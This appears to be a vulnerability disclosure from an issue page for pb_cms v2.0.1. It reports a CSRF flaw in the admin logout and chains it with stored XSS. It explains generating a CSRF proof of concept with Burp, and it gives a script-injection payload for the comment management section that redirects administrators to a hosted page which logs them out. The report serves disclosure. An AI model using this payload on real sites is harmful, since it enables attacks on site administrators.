pb_cms v2.0.1 A Cross-Site Request Forge vulnerability exists in the backend exit function

pb_cms v2.0.1 A Cross-Site Request Forge vulnerability exists in the logout of the backend system
The function points are shown in the following figure
![输入图片说明](https://foruda.gitee.com/images/1739754257274904841/378f46f4_13337431.png "屏幕截图 2025-02-17 082419.png")

burp to grab the packet, click on Engagement tools, and then click on Generate CSRF PoC

![输入图片说明](https://foruda.gitee.com/images/1739754339042567076/106ff4bf_13337431.png "屏幕截图 2025-02-17 082533.png")
Save the html as shown in the figure below, save it as a.html and put it on the corresponding website (I put it locally because my PB-CMS website is also built locally) 
![输入图片说明](https://foruda.gitee.com/images/1739754362040500889/1c1e34bf_13337431.png "屏幕截图 2025-02-17 082706.png")

Tried to access this html, refresh the website on the left, and the administrator is logged out
![输入图片说明](https://foruda.gitee.com/images/1739754381325478849/a3eea85a_13337431.png "屏幕截图 2025-02-17 083616.png")
![输入图片说明](https://foruda.gitee.com/images/1739754408329985503/4bea68c8_13337431.png "屏幕截图 2025-02-17 083715.png")

Expanding the compromise in conjunction with XSS vulnerabilities:

In the website management, comment management, and review comment section, insert the malicious code above, and click Save

![输入图片说明](https://foruda.gitee.com/images/1739754434712748927/64762ff5_13337431.png "屏幕截图 2025-02-17 085739.png")
poc：

```
">
<script>
window.location.href = "http://192.168.203.128/a.html";
</script>
```

After clicking Save, you will be automatically logged out, and the administrator will log out as soon as they access the comment management office, which will cause great harm

![输入图片说明](https://foruda.gitee.com/images/1739754468339644521/cd6d87ff_13337431.png "屏幕截图 2025-02-17 085804.png")

LinZhaoguan/pb-cms

Content Risk Flag

Comments (0)

LinZhaoguan/pb-cms .gitee-modal { width: 500px !important; }

Content Risk Flag